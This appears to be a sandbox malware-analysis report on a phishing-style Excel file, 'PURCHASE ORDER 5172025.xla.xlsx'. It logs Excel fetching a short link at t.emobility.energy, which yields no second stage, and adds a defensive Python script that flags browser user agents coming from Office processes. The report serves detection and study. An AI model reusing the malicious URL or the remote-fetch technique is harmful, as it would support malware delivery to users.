Mar 25, 2025 17:51:25.261604071 CET | 443 | 49731 | 13.107.246.40 | 192.168.2.27
Mar 25, 2025 17:51:25.261764050 CET | 49731 | 443 | 192.168.2.27 | 13.107.246.40
Mar 25, 2025 17:51:25.262283087 CET | 49731 | 443 | 192.168.2.27 | 13.107.246.40
Mar 25, 2025 17:51:25.262305021 CET | 443 | 49731 | 13.107.246.40 | 192.168.2.27
Mar 25, 2025 17:51:25.262315035 CET | 49731 | 443 | 192.168.2.27 | 13.107.246.40
Mar 25, 2025 17:51:25.262320995 CET | 443 | 49731 | 13.107.246.40 | 192.168.2.27
Mar 25, 2025 17:51:25.294441938 CET | 443 | 49730 | 13.107.246.40 | 192.168.2.27
Mar 25, 2025 17:51:25.294460058 CET | 443 | 49730 | 13.107.246.40 | 192.168.2.27
Mar 25, 2025 17:51:25.294512987 CET | 443 | 49730 | 13.107.246.40 | 192.168.2.27
Mar 25, 2025 17:51:25.294560909 CET | 49730 | 443 | 192.168.2.27 | 13.107.246.40
Mar 25, 2025 17:51:25.294586897 CET | 49730 | 443 | 192.168.2.27 | 13.107.246.40
Mar 25, 2025 17:51:25.294868946 CET | 49730 | 443 | 192.168.2.27 | 13.107.246.40
Mar 25, 2025 17:51:25.294889927 CET | 443 | 49730 | 13.107.246.40 | 192.168.2.27
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 25, 2025 17:51:09.132519960 CET | 59737 | 53 | 192.168.2.27 | 1.1.1.1
Mar 25, 2025 17:51:09.284486055 CET | 53 | 59737 | 1.1.1.1 | 192.168.2.27
Mar 25, 2025 17:51:24.603542089 CET | 59737 | 53 | 192.168.2.27 | 1.1.1.1
Mar 25, 2025 17:51:24.759725094 CET | 53 | 59737 | 1.1.1.1 | 192.168.2.27
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 25, 2025 17:51:09.132519960 CET | 192.168.2.27 | 1.1.1.1 | 0x6df5 | Standard query (0) | t.emobility.energy | A (IP address) | IN (0x0001) | false
Mar 25, 2025 17:51:24.603542089 CET | 192.168.2.27 | 1.1.1.1 | 0xba2c | Standard query (0) | otelrules.svc.static.microsoft | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 25, 2025 17:50:22.220992088 CET | 1.1.1.1 | 192.168.2.27 | 0x45aa | No error (0) | ecs-office.s-0005.dual-s-msedge.net | s-0005.dual-s-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 25, 2025 17:50:22.220992088 CET | 1.1.1.1 | 192.168.2.27 | 0x45aa | No error (0) | s-0005.dual-s-msedge.net | - | 52.123.129.14 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 17:50:22.220992088 CET | 1.1.1.1 | 192.168.2.27 | 0x45aa | No error (0) | s-0005.dual-s-msedge.net | - | 52.123.128.14 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 17:51:09.284486055 CET | 1.1.1.1 | 192.168.2.27 | 0x6df5 | No error (0) | t.emobility.energy | host1.emobility.energy | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 25, 2025 17:51:09.284486055 CET | 1.1.1.1 | 192.168.2.27 | 0x6df5 | No error (0) | host1.emobility.energy | - | 162.19.137.157 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 17:51:20.438862085 CET | 1.1.1.1 | 192.168.2.27 | 0xbb69 | No error (0) | res-stls-prod.edgesuite.net.globalredir.akadns88.net | a726.dscd.akamai.net | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 25, 2025 17:51:20.438862085 CET | 1.1.1.1 | 192.168.2.27 | 0xbb69 | No error (0) | a726.dscd.akamai.net | - | 23.44.136.151 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 17:51:20.438862085 CET | 1.1.1.1 | 192.168.2.27 | 0xbb69 | No error (0) | a726.dscd.akamai.net | - | 23.44.136.161 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 17:51:20.438862085 CET | 1.1.1.1 | 192.168.2.27 | 0xbb69 | No error (0) | a726.dscd.akamai.net | - | 23.44.136.159 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 17:51:20.438862085 CET | 1.1.1.1 | 192.168.2.27 | 0xbb69 | No error (0) | a726.dscd.akamai.net | - | 23.44.136.155 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 17:51:20.438862085 CET | 1.1.1.1 | 192.168.2.27 | 0xbb69 | No error (0) | a726.dscd.akamai.net | - | 23.44.136.152 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 17:51:20.438862085 CET | 1.1.1.1 | 192.168.2.27 | 0xbb69 | No error (0) | a726.dscd.akamai.net | - | 23.44.136.147 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 17:51:20.438862085 CET | 1.1.1.1 | 192.168.2.27 | 0xbb69 | No error (0) | a726.dscd.akamai.net | - | 23.44.136.156 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 17:51:20.438862085 CET | 1.1.1.1 | 192.168.2.27 | 0xbb69 | No error (0) | a726.dscd.akamai.net | - | 23.44.136.150 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 17:51:20.438862085 CET | 1.1.1.1 | 192.168.2.27 | 0xbb69 | No error (0) | a726.dscd.akamai.net | - | 23.44.136.157 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 17:51:24.759725094 CET | 1.1.1.1 | 192.168.2.27 | 0xba2c | No error (0) | otelrules.svc.static.microsoft | otelrules-bzhndjfje8dvh5fd.z01.azurefd.net | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 25, 2025 17:51:24.759725094 CET | 1.1.1.1 | 192.168.2.27 | 0xba2c | No error (0) | otelrules-bzhndjfje8dvh5fd.z01.azurefd.net | star-azurefd-prod.trafficmanager.net | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 25, 2025 17:51:24.759725094 CET | 1.1.1.1 | 192.168.2.27 | 0xba2c | No error (0) | star-azurefd-prod.trafficmanager.net | shed.dual-low.s-part-0012.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 25, 2025 17:51:24.759725094 CET | 1.1.1.1 | 192.168.2.27 | 0xba2c | No error (0) | shed.dual-low.s-part-0012.t-0009.t-msedge.net | s-part-0012.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 25, 2025 17:51:24.759725094 CET | 1.1.1.1 | 192.168.2.27 | 0xba2c | No error (0) | s-part-0012.t-0009.t-msedge.net | - | 13.107.246.40 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 17:51:36.909840107 CET | 1.1.1.1 | 192.168.2.27 | 0xe296 | No error (0) | res-stls-prod.edgesuite.net.globalredir.akadns88.net | a726.dscd.akamai.net | - | CNAME (Canonical name) | IN (0x0001) | false
Mar 25, 2025 17:51:36.909840107 CET | 1.1.1.1 | 192.168.2.27 | 0xe296 | No error (0) | a726.dscd.akamai.net | - | 23.44.136.179 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 17:51:36.909840107 CET | 1.1.1.1 | 192.168.2.27 | 0xe296 | No error (0) | a726.dscd.akamai.net | - | 23.44.136.184 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 17:51:36.909840107 CET | 1.1.1.1 | 192.168.2.27 | 0xe296 | No error (0) | a726.dscd.akamai.net | - | 23.44.136.175 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 17:51:36.909840107 CET | 1.1.1.1 | 192.168.2.27 | 0xe296 | No error (0) | a726.dscd.akamai.net | - | 23.44.136.185 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 17:51:36.909840107 CET | 1.1.1.1 | 192.168.2.27 | 0xe296 | No error (0) | a726.dscd.akamai.net | - | 23.44.136.183 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 17:51:36.909840107 CET | 1.1.1.1 | 192.168.2.27 | 0xe296 | No error (0) | a726.dscd.akamai.net | - | 23.44.136.182 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 17:51:36.909840107 CET | 1.1.1.1 | 192.168.2.27 | 0xe296 | No error (0) | a726.dscd.akamai.net | - | 23.44.136.180 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 17:51:36.909840107 CET | 1.1.1.1 | 192.168.2.27 | 0xe296 | No error (0) | a726.dscd.akamai.net | - | 23.44.136.186 | A (IP address) | IN (0x0001) | false
Mar 25, 2025 17:51:36.909840107 CET | 1.1.1.1 | 192.168.2.27 | 0xe296 | No error (0) | a726.dscd.akamai.net | - | 23.44.136.181 | A (IP address) | IN (0x0001) | false
                                    • t.emobility.energy
                                    • otelrules.svc.static.microsoft
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.27 | 49723 | 162.19.137.157 | 443 | 8128 | C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
2025-03-25 16:51:09 UTC | 222 | OUT | GET /kqQ8bI HTTP/1.1
                                    Accept: */*
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Host: t.emobility.energy
                                    Connection: Keep-Alive
2025-03-25 16:51:10 UTC | 539 | IN | HTTP/1.1 301 Moved Permanently
                                    Date: Tue, 25 Mar 2025 16:51:09 GMT
                                    Server: Apache/2.4.62 (Debian)
                                    X-DNS-Prefetch-Control: off
                                    X-Frame-Options: SAMEORIGIN
                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                    X-Download-Options: noopen
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    Location: /404
                                    Vary: Accept
                                    Content-Type: text/plain; charset=utf-8
                                    Content-Length: 38
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                                    Connection: close
2025-03-25 16:51:10 UTC | 38 | IN | Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 34 30 34
                                    Data Ascii: Moved Permanently. Redirecting to /404


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.27 | 49724 | 162.19.137.157 | 443 | 8128 | C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
2025-03-25 16:51:10 UTC | 219 | OUT | GET /404 HTTP/1.1
                                    Accept: */*
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Host: t.emobility.energy
                                    Connection: Keep-Alive
2025-03-25 16:51:10 UTC | 590 | IN | HTTP/1.1 404 Not Found
                                    Date: Tue, 25 Mar 2025 16:51:10 GMT
                                    Server: Apache/2.4.62 (Debian)
                                    X-DNS-Prefetch-Control: off
                                    X-Frame-Options: SAMEORIGIN
                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                    X-Download-Options: noopen
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    X-Powered-By: Next.js
                                    ETag: "1225-4lR+8o8+z0M1Iq6OMuNgxAtPjT8"
                                    Content-Type: text/html; charset=utf-8
                                    Content-Length: 4645
                                    Vary: Accept-Encoding
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                                    Connection: close
2025-03-25 16:51:10 UTC | 4645 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 75 6e 64 65 66 69 6e 65 64 20 69 73 20 61 20 66 72 65 65 20 61 6e 64 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 55 52 4c 20 73 68 6f 72 74 65 6e 65 72 20 77 69 74 68 20 63 75 73 74 6f 6d 20 64 6f 6d 61 69 6e 73 20 61 6e
                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover"/><meta name="description" content="undefined is a free and open source URL shortener with custom domains an


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.27 | 49731 | 13.107.246.40 | 443 | 8128 | C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
2025-03-25 16:51:25 UTC | 214 | OUT | GET /rules/rule170146v0s19.xml HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept-Encoding: gzip
                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)
                                    Host: otelrules.svc.static.microsoft
2025-03-25 16:51:25 UTC | 491 | IN | HTTP/1.1 200 OK
                                    Date: Tue, 25 Mar 2025 16:51:25 GMT
                                    Content-Type: text/xml
                                    Content-Length: 461
                                    Connection: close
                                    Cache-Control: public, max-age=604800, immutable
                                    Last-Modified: Thu, 14 Nov 2024 16:14:57 GMT
                                    ETag: "0x8DD04C77BDE7614"
                                    x-ms-request-id: 983e9fb2-c01e-002b-6ba5-9d6e00000000
                                    x-ms-version: 2018-03-28
                                    x-azure-ref: 20250325T165125Z-17cccd5449bcdqb4hC1EWRt7pn00000003ug00000000n65a
                                    x-fd-int-roxy-purgeid: 0
                                    X-Cache: TCP_HIT
                                    X-Cache-Info: L1_T2
                                    Accept-Ranges: bytes
2025-03-25 16:51:25 UTC | 461 | IN | Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 37 30 31 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 47 72 61 70 68 69 63 73 2e 45 78 70 6f 72 74 42 75 6c 6c 65 74 42 6c 69 70 43 45 78 63 65 70 74 69 6f 6e 22 20 41 54 54 3d 22 63 66 63 66 64 62 39 31 63 36 38 63 34 33 32 39 62 62 38 62 37 63 62 37 62 61 62 62 33 63 66 37 2d 65 30 38 32 63 32 66 32 2d 65 66 31 64 2d 34 32 37 61 2d 61 63 34 64 2d 62 30 62 37 30 30 61 66 65 37 61 37 2d 37 36 35 35 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 34 38 39 66 34 22 20
                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="170146" V="0" DC="SM" EN="Office.Graphics.ExportBulletBlipCException" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="489f4"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.27 | 49730 | 13.107.246.40 | 443 | 8128 | C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
2025-03-25 16:51:25 UTC | 215 | OUT | GET /rules/rule120201v19s19.xml HTTP/1.1
                                    Connection: Keep-Alive
                                    Accept-Encoding: gzip
                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)
                                    Host: otelrules.svc.static.microsoft
2025-03-25 16:51:25 UTC | 515 | IN | HTTP/1.1 200 OK
                                    Date: Tue, 25 Mar 2025 16:51:25 GMT
                                    Content-Type: text/xml
                                    Content-Length: 2781
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Cache-Control: public, max-age=604800, immutable
                                    Last-Modified: Tue, 31 Dec 2024 22:07:50 GMT
                                    ETag: "0x8DD29E791389B5C"
                                    x-ms-request-id: 756ff186-d01e-0014-74a5-9ded58000000
                                    x-ms-version: 2018-03-28
                                    x-azure-ref: 20250325T165125Z-17cccd5449bn9hh6hC1EWRzvfg0000000e6g00000000bzz1
                                    x-fd-int-roxy-purgeid: 0
                                    X-Cache: TCP_HIT
                                    X-Cache-Info: L1_T2
                                    Accept-Ranges: bytes
2025-03-25 16:51:25 UTC | 2781 | IN | Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 32 30 31 22 20 56 3d 22 31 39 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 73 61 67 65 2e 43 6c 69 63 6b 53 74 72 65 61 6d 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 55 73 61 67 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20
                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120201" V="19" DC="SM" EN="Office.System.SystemHealthUsage.ClickStream" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalUsage" DCa="PSU" xmlns=""> <RIS>
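The four sessions above split cleanly into two kinds of traffic from the same EXCEL.EXE process (PID 8128). Sessions 2 and 3 are Office's own telemetry-rule downloads: Office user agent, Microsoft host, cacheable XML. Sessions 0 and 1 are the ones the "Excel Network Connections" and "known web browser user agent" signatures are about: an Internet Explorer/Trident user agent plus a UA-CPU header, a non-Microsoft host (t.emobility.energy, resolved via a CNAME to 162.19.137.157 in the DNS table), and a short-link path /kqQ8bI that the server answered with a 301 to /404, whose body identifies a self-hosted URL shortener, so no second-stage content was retrieved in this run. The script below applies exactly that separation to the captured requests. It is an added example for this page, not Joe Sandbox code: the session records are constructed from the four dumps above (request heads verbatim, status and Location from the responses), the Microsoft-host allowlist is an assumption that must be tuned per environment, and the UA-CPU rule is a heuristic.

```python
"""Triage of HTTP requests made by Office processes, modelled on the
'Excel Network Connections' and 'known web browser user agent' signatures
this report fires. Added example for this page; not Joe Sandbox code.
SESSIONS is constructed from the four HTTP sessions captured in the report
(request heads verbatim, response status/Location taken from the dumps).
"""
import re
from dataclasses import dataclass

OFFICE_IMAGES = {"EXCEL.EXE", "WINWORD.EXE", "POWERPNT.EXE", "MSACCESS.EXE", "OUTLOOK.EXE"}
# Hosts Office contacts on its own (telemetry rules, CDN, licensing). Assumption:
# an allowlist like this must be tuned per environment; it is illustrative here.
OFFICE_SERVICE_SUFFIXES = (".microsoft", ".microsoft.com", ".office.com", ".office.net",
                           ".live.com", ".msedge.net", ".azurefd.net", ".akamai.net")
BROWSER_UA = re.compile(r"^Mozilla/\d\.\d .*\b(Trident|MSIE|Chrome|Firefox|Safari)\b")
OFFICE_UA = re.compile(r"^Microsoft Office/\d+\.\d+")
REDIRECTS = {301, 302, 303, 307, 308}


@dataclass
class Session:
    sid: int
    pid: int
    image: str            # process image name
    dst: str              # "ip:port"
    request: str          # raw request head as captured
    status: int           # first response status
    location: str = ""    # Location header of the response, if any


def parse_request(raw: str):
    """Split a captured HTTP request head into (method, path, {header: value})."""
    lines = [ln for ln in raw.splitlines() if ln.strip()]
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def is_office_service_host(host: str) -> bool:
    host = host.lower().rstrip(".")
    return any(host.endswith(s) or host == s[1:] for s in OFFICE_SERVICE_SUFFIXES)


def triage(s: Session):
    """Return the findings for one session; an empty list means nothing stood out."""
    findings = []
    if s.image.upper() not in OFFICE_IMAGES:
        return findings
    method, path, headers = parse_request(s.request)
    host, ua = headers.get("host", ""), headers.get("user-agent", "")
    if not is_office_service_host(host):
        findings.append(f"{s.image} (pid {s.pid}) contacted non-Microsoft host {host} ({s.dst})")
    if BROWSER_UA.match(ua) and not OFFICE_UA.match(ua):
        findings.append(f"browser User-Agent from an Office process: {ua}")
    if "ua-cpu" in headers:
        # Heuristic: UA-CPU is added by the WinINet/urlmon (Internet Explorer) stack,
        # not by Office's own HTTP client, so the request came from a different code path.
        findings.append("UA-CPU header: request issued through WinINet/urlmon")
    if s.status in REDIRECTS and s.location:
        findings.append(f"{method} {path} -> {s.status} redirect to {s.location}")
    return findings


def triage_all(sessions):
    return {s.sid: triage(s) for s in sessions}


_IE_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
_OFFICE_UA = "Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)"

# Constructed from the report's session dumps.
SESSIONS = [
    Session(0, 8128, "EXCEL.EXE", "162.19.137.157:443",
            "GET /kqQ8bI HTTP/1.1\r\nAccept: */*\r\nUA-CPU: AMD64\r\n"
            "Accept-Encoding: gzip, deflate\r\nUser-Agent: " + _IE_UA + "\r\n"
            "Host: t.emobility.energy\r\nConnection: Keep-Alive\r\n", 301, "/404"),
    Session(1, 8128, "EXCEL.EXE", "162.19.137.157:443",
            "GET /404 HTTP/1.1\r\nAccept: */*\r\nUA-CPU: AMD64\r\n"
            "Accept-Encoding: gzip, deflate\r\nUser-Agent: " + _IE_UA + "\r\n"
            "Host: t.emobility.energy\r\nConnection: Keep-Alive\r\n", 404),
    Session(2, 8128, "EXCEL.EXE", "13.107.246.40:443",
            "GET /rules/rule170146v0s19.xml HTTP/1.1\r\nConnection: Keep-Alive\r\n"
            "Accept-Encoding: gzip\r\nUser-Agent: " + _OFFICE_UA + "\r\n"
            "Host: otelrules.svc.static.microsoft\r\n", 200),
    Session(3, 8128, "EXCEL.EXE", "13.107.246.40:443",
            "GET /rules/rule120201v19s19.xml HTTP/1.1\r\nConnection: Keep-Alive\r\n"
            "Accept-Encoding: gzip\r\nUser-Agent: " + _OFFICE_UA + "\r\n"
            "Host: otelrules.svc.static.microsoft\r\n", 200),
]

if __name__ == "__main__":
    for sid, findings in triage_all(SESSIONS).items():
        print(f"session {sid}: {'clean' if not findings else ''}")
        for finding in findings:
            print("  -", finding)
```

The allowlist is deliberately the weakest part: a sandbox report lets you see the full set of hosts, but in production the same rule needs an environment-specific list of hosts Office is expected to reach, otherwise every proxy-autoconfig or CDN hit becomes a finding. The user-agent and UA-CPU rules do not depend on that list, which is why they are the more portable signal here.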


                                    Target ID:0
                                    Start time:12:50:14
                                    Start date:25/03/2025
                                    Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                    Imagebase:0x7ff6879a0000
                                    File size:70'082'712 bytes
                                    MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false

                                    Target ID:8
                                    Start time:12:50:31
                                    Start date:25/03/2025
                                    Path:C:\Windows\System32\appidpolicyconverter.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\appidpolicyconverter.exe"
                                    Imagebase:0x7ff7dd3c0000
                                    File size:155'648 bytes
                                    MD5 hash:6567D9CF2545FAAC60974D9D682700D4
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:9
                                    Start time:12:50:31
                                    Start date:25/03/2025
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7639b0000
                                    File size:1'040'384 bytes
                                    MD5 hash:9698384842DA735D80D278A427A229AB
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:14
                                    Start time:12:51:17
                                    Start date:25/03/2025
                                    Path:C:\Windows\splwow64.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\splwow64.exe 12288
                                    Imagebase:0x7ff679610000
                                    File size:192'512 bytes
                                    MD5 hash:4C1F48431A4C5DE7841216C32CD98C46
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false

                                    Target ID:18
                                    Start time:12:51:31
                                    Start date:25/03/2025
                                    Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PURCHASE ORDER 5172025.xla.xlsx"
                                    Imagebase:0x7ff6879a0000
                                    File size:70'082'712 bytes
                                    MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Call Graph

                                    • Entrypoint
                                    • Decryption Function
                                    • Executed
                                    • Not Executed
                                    callgraph 1 Error: Graph is empty

                                    Module: Sheet1

                                    Declaration
                                    Line  Content
                                    1     Attribute VB_Name = "Sheet1"
                                    2     Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                    3     Attribute VB_GlobalNameSpace = False
                                    4     Attribute VB_Creatable = False
                                    5     Attribute VB_PredeclaredId = True
                                    6     Attribute VB_Exposed = True
                                    7     Attribute VB_TemplateDerived = False
                                    8     Attribute VB_Customizable = True

                                    Module: Sheet2

                                    Declaration
                                    Line  Content
                                    1     Attribute VB_Name = "Sheet2"
                                    2     Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                    3     Attribute VB_GlobalNameSpace = False
                                    4     Attribute VB_Creatable = False
                                    5     Attribute VB_PredeclaredId = True
                                    6     Attribute VB_Exposed = True
                                    7     Attribute VB_TemplateDerived = False
                                    8     Attribute VB_Customizable = True

                                    Module: Sheet3

                                    Declaration
                                    Line  Content
                                    1     Attribute VB_Name = "Sheet3"
                                    2     Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                    3     Attribute VB_GlobalNameSpace = False
                                    4     Attribute VB_Creatable = False
                                    5     Attribute VB_PredeclaredId = True
                                    6     Attribute VB_Exposed = True
                                    7     Attribute VB_TemplateDerived = False
                                    8     Attribute VB_Customizable = True

                                    Module: ThisWorkbook

                                    Declaration
                                    Line  Content
                                    1     Attribute VB_Name = "ThisWorkbook"
                                    2     Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                    3     Attribute VB_GlobalNameSpace = False
                                    4     Attribute VB_Creatable = False
                                    5     Attribute VB_PredeclaredId = True
                                    6     Attribute VB_Exposed = True
                                    7     Attribute VB_TemplateDerived = False
                                    8     Attribute VB_Customizable = True